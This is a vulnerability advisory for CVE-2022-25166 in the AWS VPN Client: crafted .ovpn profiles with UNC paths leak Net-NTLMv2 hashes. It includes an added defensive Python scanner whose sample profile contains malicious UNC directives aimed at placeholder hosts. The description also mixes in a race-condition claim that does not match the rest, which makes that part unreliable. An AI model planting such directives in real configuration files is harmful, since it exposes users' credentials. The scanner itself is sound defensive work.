PT-2022-2554 · Amazon · Amazon Aws Client Vpn

David Yesland · Published 2022-02-15 · Updated 2024-12-26 · CVE-2022-25166

CVSS v2.0: 6.8 (Medium)

Vector: AV:L/AC:L/Au:S/C:C/I:C/A:C

Name of the Vulnerable Software and Affected Versions

Amazon AWS VPN Client version 2.0.0

Description

The issue is related to the Amazon AWS VPN Client, where it is possible to include a UNC path in the OpenVPN configuration file when referencing file paths for parameters such as auth-user-pass. When this file is imported and the client attempts to validate the file path, it performs an open operation on the path and leaks the user's Net-NTLMv2 hash to an external server. This could be exploited by having a user open a crafted malicious ovpn configuration file. The vulnerability is also related to errors in synchronization when using a shared resource, which can allow an attacker to elevate their privileges or cause a denial of service.

Recommendations

For Amazon AWS VPN Client version 2.0.0, consider disabling the import of OpenVPN configuration files that contain UNC paths until a patch is available. Restrict access to the auth-user-pass parameter to minimize the risk of exploitation. Avoid using the auth-user-pass parameter in the OpenVPN configuration file until the issue is resolved. As a temporary workaround, consider monitoring the configuration file for any changes and removing any malicious directives.
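One way to apply the recommendation to screen configuration files, as an added example (not part of the original advisory and not Amazon's code): a pre-import scan of an .ovpn profile that flags file-path directives whose argument is a UNC path. The directive list beyond auth-user-pass, the function name and the sample host names are assumptions.

```python
import re

# File-path directives to inspect. The page names auth-user-pass; the rest are
# standard OpenVPN options that also take a path (assumption, for coverage).
FILE_DIRECTIVES = {"auth-user-pass", "askpass", "ca", "cert", "key", "pkcs12",
                   "dh", "tls-auth", "tls-crypt", "crl-verify", "secret", "config"}
# Two or more leading slashes/backslashes (optionally quoted) mark a UNC-style
# path: \\host\share, the escaped form \\\\host\\share, and //host/share.
UNC_RE = re.compile(r"""^["']?[\\/]{2,}[^\\/\s"']""")
INLINE_OPEN = re.compile(r"^<([a-z0-9-]+)>$")


def find_unc_directives(ovpn_text):
    """Return [(line_no, directive, argument)] for file directives using UNC paths."""
    findings = []
    inline_tag = None  # lines inside <ca>...</ca> style blocks are data, not directives
    for line_no, raw in enumerate(ovpn_text.splitlines(), start=1):
        line = raw.strip()
        if inline_tag:
            if line == f"</{inline_tag}>":
                inline_tag = None
            continue
        if not line or line[0] in "#;":
            continue
        m = INLINE_OPEN.match(line)
        if m:
            inline_tag = m.group(1)
            continue
        parts = line.split(None, 1)
        directive = parts[0].lstrip("-").lower()
        if directive in FILE_DIRECTIVES and len(parts) == 2 and UNC_RE.match(parts[1]):
            findings.append((line_no, directive, parts[1]))
    return findings


# Constructed sample profile; host names are placeholders, not from the advisory.
SAMPLE = r'''client
remote vpn.example.invalid 443
; auth-user-pass \\\\old.example.invalid\\share\\creds.txt
auth-user-pass \\\\files.example.invalid\\share\\creds.txt
ca "//files.example.invalid/share/ca.crt"
cert C:\\Users\\alice\\client.crt
<key>
\\inline-data\is-not-a-directive
</key>
'''

if __name__ == "__main__":
    for line_no, directive, arg in find_unc_directives(SAMPLE):
        print(f"line {line_no}: {directive} -> UNC path {arg}")
```

A profile that produces any finding can be quarantined for review instead of being imported into the client.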

Exploit

Fix

Information Disclosure

Race Condition

Weakness Enumeration

Related Identifiers

BDU:2022-02980
CVE-2022-25166

Affected Products

Amazon Aws Client Vpn